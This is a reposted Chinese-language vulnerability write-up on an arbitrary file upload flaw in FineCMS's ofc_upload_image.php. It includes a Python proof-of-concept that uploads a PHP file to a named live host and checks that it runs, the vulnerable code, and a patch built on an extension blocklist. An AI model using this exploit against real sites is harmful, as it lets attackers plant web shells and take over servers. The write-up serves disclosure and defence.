FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul
生活随笔
收集整理的這篇文章主要介紹了
FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
catalog
1. 漏洞描述 2. 漏洞觸發(fā)條件 3. 漏洞影響范圍 4. 漏洞代碼分析 5. 防御方法 6. 攻防思考?
1. 漏洞描述
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2015-0105251
2. 漏洞觸發(fā)條件
0x1: POC
#!/usr/bin/env python # -*- coding: utf-8 -*- #__author__ = '1c3z' import urllib2 import randomfileName = "shell" + str(random.randrange(1000,9999)) + ".php" target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" def uploadShell():url = target + "?name=" + fileNamereq = urllib2.Request(url, headers={"Content-Type": "application/oct"}) res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")return res.read()def poc():res = uploadShell()if res.find("tmp-upload-images") == -1:print "Failed !"returnprint "upload Shell success"url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileNamemd5 = urllib2.urlopen(url).read()if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:print "poc: " + url poc()
3. 漏洞影響范圍
4. 漏洞代碼分析
/dayrui/libraries/Chart/ofc_upload_image.php
$default_path = '../tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true); $destination = $default_path . basename( $_GET[ 'name' ] ); echo 'Saving your image to: '. $destination;$jfh = fopen($destination, 'w') or die("can't open file"); fwrite($jfh, $HTTP_RAW_POST_DATA); fclose($jfh);程序未對上傳文件進(jìn)行任何后綴、內(nèi)容的檢測和過濾
5. 防御方法
/dayrui/libraries/Chart/ofc_upload_image.php
$default_path = '../tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true);$destination = $default_path . basename( $_GET[ 'name' ] ); /* */ if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($destination))) {die("你指定的文件名被系統(tǒng)禁止!"); } /* */echo 'Saving your image to: '. $destination;$jfh = fopen($destination, 'w') or die("can't open file"); fwrite($jfh, $HTTP_RAW_POST_DATA); fclose($jfh);
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
?
轉(zhuǎn)載于:https://www.cnblogs.com/LittleHann/p/4729648.html
總結(jié)
以上是生活随笔為你收集整理的FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: JSBinding+SharpKit /
- 下一篇: HDU 4430 amp; ZOJ 36